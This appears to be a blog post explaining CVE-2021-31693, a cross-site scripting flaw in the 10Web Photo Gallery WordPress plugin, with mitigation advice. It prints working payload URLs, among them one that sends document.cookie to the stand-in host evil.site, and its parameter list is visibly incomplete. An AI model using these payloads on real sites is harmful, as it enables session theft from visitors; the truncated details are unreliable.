CVE-2021-31693 - Exploiting XSS in 10Web Photo Gallery Plugin for WordPress (Through 1.5.68)

The 10Web Photo Gallery plugin is popular among WordPress users for creating attractive image galleries. However, security researchers discovered a serious vulnerability—CVE-2021-31693—which can allow attackers to run scripts in your browser by exploiting specific parameters in the plugin’s frontend. This post breaks down what the vulnerability is, shows how it can be exploited, and offers advice for protection.

What is CVE-2021-31693?

CVE-2021-31693 is a *Cross-Site Scripting* (XSS) vulnerability affecting the 10Web Photo Gallery plugin versions up to 1.5.68. It lets attackers inject malicious JavaScript through three URL parameters:

type_

All part of the plugin’s bwg_frontend_data.

Note: Other parameters in the plugin have separate CVEs:  
- CVE-2021-24291  
- CVE-2021-25041
- CVE-2021-46889  
Also, there is no relation to VMware’s CVE-2022-31693—that was a typo in early reports.

Exploit the user’s browser further

This is particularly bad for WordPress sites, which are often targets for automated attacks.

Technical Details & Exploit Example

The 10Web plugin failed to properly sanitize input from these parameters. If a user visits a crafted URL, the malicious code runs in their browser.

Suppose your site is

https://example.com/gallery

A malicious hacker could create a link like this

https://example.com/gallery?bwg_frontend_data[album_gallery_id_]="><script>alert('XSS')</script>

When someone clicks the link or visits the page, the alert box will appear, proving code execution is possible.

More realistic payload (stealing cookies)

https://example.com/gallery?bwg_frontend_data[album_gallery_id_]="><script>fetch('https://evil.site/?c='+document.cookie)</script>

Warning: Never test against websites you do not own!

These attacks also work with bwg_album_search_ and type_

https://example.com/gallery?bwg_frontend_data[type_]="><img src=x onerror=alert('Hacked')>

If you are a developer, the main fix is to sanitize and escape user input before outputting it

<?php
// Example checking input before echoing it, if customizing or patching code
$input = $_GET['bwg_frontend_data']['album_gallery_id_'] ?? '';
$safe_input = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
echo $safe_input; // This will avert XSS!
?>

The official patch from the plugin fixed the sanitization routines, so always update to the latest version.

Defense and Mitigation

1. Update Immediately: Make sure you’re running version 1.5.69 or higher of 10Web Photo Gallery.  
  👉 Official Plugin Page
2. Use a web application firewall (WAF) such as Wordfence or Sucuri.

More Information & References

- National Vulnerability Database Entry for CVE-2021-31693
- WPScan Advisory
- Wordfence Threat Intelligence Report

> :warning: Don’t confuse this with VMware’s CVE-2022-31693—that’s a different issue!

Conclusion

CVE-2021-31693 is a serious vulnerability. If you run 10Web Photo Gallery and haven’t updated recently, you could be putting your site and visitors at risk. Make sure you’re up to date, keep an eye on plugin security advisories, and practice good website hygiene. If you have any questions—reach out to your hosting provider or a WordPress security professional.

Stay safe! If you found this read useful, share it with others to keep the WordPress community secure.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 06/07/2023 16:15:00 UTC